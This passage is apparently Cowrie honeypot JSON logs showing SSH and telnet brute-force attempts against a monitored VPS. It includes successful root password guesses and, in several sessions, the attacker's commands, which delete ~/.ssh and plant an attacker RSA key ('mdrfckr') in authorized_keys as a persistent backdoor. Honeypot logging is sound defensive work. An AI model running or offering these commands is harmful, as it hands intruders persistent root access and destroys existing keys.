03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:40:21.607891Z","src_ip":"212.227.235.229","session":"4a4cc63bc1d5"}
{"eventid":"cowrie.login.failed","username":"free","password":"free","message":"login attempt [free/free] failed","sensor":"my-vps","timestamp":"2025-08-26T04:40:21.960887Z","src_ip":"212.227.235.229","session":"4a4cc63bc1d5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:40:23.040815Z","src_ip":"212.227.235.229","session":"4a4cc63bc1d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43144,"dst_ip":"1.2.3.4","dst_port":22,"session":"493e2cf76b1c","protocol":"ssh","message":"New connection: 212.227.235.229:43144 (1.2.3.4:22) [session: 493e2cf76b1c]","sensor":"my-vps","timestamp":"2025-08-26T04:40:45.098064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:40:45.098784Z","src_ip":"212.227.235.229","session":"493e2cf76b1c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:40:45.368073Z","src_ip":"212.227.235.229","session":"493e2cf76b1c"}
{"eventid":"cowrie.login.success","username":"root","password":"Hu123456789","message":"login attempt [root/Hu123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:40:46.487509Z","src_ip":"212.227.235.229","session":"493e2cf76b1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:40:47.108405Z","src_ip":"212.227.235.229","session":"493e2cf76b1c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:40:47.109184Z","src_ip":"212.227.235.229","session":"493e2cf76b1c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:40:47.110482Z","src_ip":"212.227.235.229","session":"493e2cf76b1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:40:47.381330Z","src_ip":"212.227.235.229","session":"493e2cf76b1c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:40:47.997021Z","src_ip":"212.227.235.229","session":"493e2cf76b1c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:40:47.997801Z","src_ip":"212.227.235.229","session":"493e2cf76b1c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:40:48.270118Z","src_ip":"212.227.235.229","session":"493e2cf76b1c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:40:48.271109Z","src_ip":"212.227.235.229","session":"493e2cf76b1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43156,"dst_ip":"1.2.3.4","dst_port":22,"session":"f84b475949bc","protocol":"ssh","message":"New connection: 212.227.235.229:43156 (1.2.3.4:22) [session: f84b475949bc]","sensor":"my-vps","timestamp":"2025-08-26T04:40:48.538343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:40:48.539521Z","src_ip":"212.227.235.229","session":"f84b475949bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:40:48.808312Z","src_ip":"212.227.235.229","session":"f84b475949bc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:40:49.925924Z","src_ip":"212.227.235.229","session":"f84b475949bc"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:40:51.197238Z","src_ip":"212.227.235.229","session":"f84b475949bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43168,"dst_ip":"1.2.3.4","dst_port":22,"session":"017d3736a20e","protocol":"ssh","message":"New connection: 212.227.235.229:43168 (1.2.3.4:22) [session: 017d3736a20e]","sensor":"my-vps","timestamp":"2025-08-26T04:40:51.464986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:40:51.465618Z","src_ip":"212.227.235.229","session":"017d3736a20e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:40:51.734210Z","src_ip":"212.227.235.229","session":"017d3736a20e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:40:52.849550Z","src_ip":"212.227.235.229","session":"017d3736a20e"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:40:53.119651Z","src_ip":"212.227.235.229","session":"493e2cf76b1c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:40:53.121237Z","src_ip":"212.227.235.229","session":"017d3736a20e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60182,"dst_ip":"1.2.3.4","dst_port":22,"session":"72b0228ed5c1","protocol":"ssh","message":"New connection: 212.227.235.229:60182 (1.2.3.4:22) [session: 72b0228ed5c1]","sensor":"my-vps","timestamp":"2025-08-26T04:41:07.975957Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:41:07.976836Z","src_ip":"212.227.235.229","session":"72b0228ed5c1"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":45658,"dst_ip":"1.2.3.4","dst_port":23,"session":"2202daa95b8b","protocol":"telnet","message":"New connection: 79.124.8.120:45658 (1.2.3.4:23) [session: 2202daa95b8b]","sensor":"my-vps","timestamp":"2025-08-26T04:41:10.345546Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:41:10.385136Z","src_ip":"79.124.8.120","session":"2202daa95b8b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:41:10.402382Z","src_ip":"79.124.8.120","session":"2202daa95b8b"}
{"eventid":"cowrie.session.connect","src_ip":"14.43.153.110","src_port":58348,"dst_ip":"1.2.3.4","dst_port":23,"session":"293bf8bc1aca","protocol":"telnet","message":"New connection: 14.43.153.110:58348 (1.2.3.4:23) [session: 293bf8bc1aca]","sensor":"my-vps","timestamp":"2025-08-26T04:41:11.605633Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33080,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fa0ae755fce","protocol":"ssh","message":"New connection: 212.227.235.229:33080 (1.2.3.4:22) [session: 9fa0ae755fce]","sensor":"my-vps","timestamp":"2025-08-26T04:41:12.603986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:41:12.605361Z","src_ip":"212.227.235.229","session":"9fa0ae755fce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:41:12.882171Z","src_ip":"212.227.235.229","session":"9fa0ae755fce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:41:13.316700Z","src_ip":"212.227.125.160","session":"c4ca3201b938"}
{"eventid":"cowrie.session.closed","duration":180.14169216156006,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:41:13.321613Z","src_ip":"212.227.125.160","session":"c4ca3201b938"}
{"eventid":"cowrie.login.success","username":"root","password":"20102010","message":"login attempt [root/20102010] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:41:14.024870Z","src_ip":"212.227.235.229","session":"9fa0ae755fce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:41:14.645114Z","src_ip":"212.227.235.229","session":"9fa0ae755fce"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:41:14.645824Z","src_ip":"212.227.235.229","session":"9fa0ae755fce"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:41:14.647026Z","src_ip":"212.227.235.229","session":"9fa0ae755fce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:41:14.924299Z","src_ip":"212.227.235.229","session":"9fa0ae755fce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:41:15.493180Z","src_ip":"212.227.235.229","session":"9fa0ae755fce"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:41:15.493886Z","src_ip":"212.227.235.229","session":"9fa0ae755fce"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:41:15.771962Z","src_ip":"212.227.235.229","session":"9fa0ae755fce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:41:15.772856Z","src_ip":"212.227.235.229","session":"9fa0ae755fce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59840,"dst_ip":"1.2.3.4","dst_port":22,"session":"5550d527add6","protocol":"ssh","message":"New connection: 212.227.235.229:59840 (1.2.3.4:22) [session: 5550d527add6]","sensor":"my-vps","timestamp":"2025-08-26T04:41:16.054624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:41:16.055561Z","src_ip":"212.227.235.229","session":"5550d527add6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:41:16.339316Z","src_ip":"212.227.235.229","session":"5550d527add6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:41:17.518299Z","src_ip":"212.227.235.229","session":"5550d527add6"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:41:18.804736Z","src_ip":"212.227.235.229","session":"5550d527add6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59866,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f4618cb35d5","protocol":"ssh","message":"New connection: 212.227.235.229:59866 (1.2.3.4:22) [session: 9f4618cb35d5]","sensor":"my-vps","timestamp":"2025-08-26T04:41:19.083602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:41:19.084325Z","src_ip":"212.227.235.229","session":"9f4618cb35d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:41:19.361518Z","src_ip":"212.227.235.229","session":"9f4618cb35d5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:41:20.510056Z","src_ip":"212.227.235.229","session":"9f4618cb35d5"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:41:20.785745Z","src_ip":"212.227.235.229","session":"9fa0ae755fce"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:41:20.788298Z","src_ip":"212.227.235.229","session":"9f4618cb35d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52196,"dst_ip":"1.2.3.4","dst_port":22,"session":"25ef01c5bcb6","protocol":"ssh","message":"New connection: 212.227.235.229:52196 (1.2.3.4:22) [session: 25ef01c5bcb6]","sensor":"my-vps","timestamp":"2025-08-26T04:41:21.365813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:41:21.366984Z","src_ip":"212.227.235.229","session":"25ef01c5bcb6"}
